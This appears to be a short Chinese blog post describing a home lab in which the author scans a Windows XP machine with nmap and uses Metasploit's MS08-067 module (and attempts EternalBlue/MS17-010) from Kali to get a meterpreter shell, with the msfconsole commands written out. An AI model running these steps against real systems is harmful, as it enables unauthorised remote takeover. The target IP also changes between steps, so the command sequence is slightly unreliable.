使用metasploit漏洞測試

沒網閒着無聊,靈魂無處安放呀,就簡單的用metasploit玩玩。

實驗環境:

目標主機:Windows XP professional

攻擊機: kali linux

1.漏洞掃描 

nmap --script=vuln 172.20.10.5

掃描結果提示,易受攻擊的有:

1.CVE-2008-4250 Microsoft Windows系統易受遠程代碼執行攻擊(MS08-067)
2.CVE-2017-0143 Microsoft SMBV1服務器中的遠程代碼執行漏洞(MS17-010)

以上述兩個爲例學習使用metasploit漏洞利用模塊進行攻擊:

2.漏洞利用

實例一:使用MS08-067模塊進行攻擊測試

命令:
啓動Metasploit:msfconsole
        msf5 >:search ms08_067 /*查找可用的攻擊模塊*/
        msf5 >:use exploit/windows/smb/ms08_067_netapi  //使用模塊
 

輸入info 可用目標主機,本次環境目標爲34 ,設置目標環境set target 34

顯示payload 需要設置的項,如下圖需要設置目標主機,設置好後執行攻擊

msf5 >:set target 34   //設置目標主機的系統版本,防止語言導致攻擊失敗
msf5 >:show payload    //顯示需要設置的項
msf5 >:set rhost  127.20.10.5 //設置目標主機Ip 
msf5 >:exploit      //執行攻擊

成功後meterpreter輸入shell即可遠程執行相關任務,查看用戶名等操作。

實例二:利用MS17-010進行攻擊測試,同裏查看可用的攻擊模塊

同樣的我們這次選用eternalblue smb遠程windows內核池破壞

設置好相關參數後開始執行攻擊,由於目標主機重啓後未激活,導致利用漏洞攻擊成功,但未能建立會話,目標主機正常啓動就能成功建立會話。

系統未激活導致無法進入,建立連接。

 

總體來說在漏洞測試方面,metasploit是非常強,簡單高效的操作提高工作效率

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章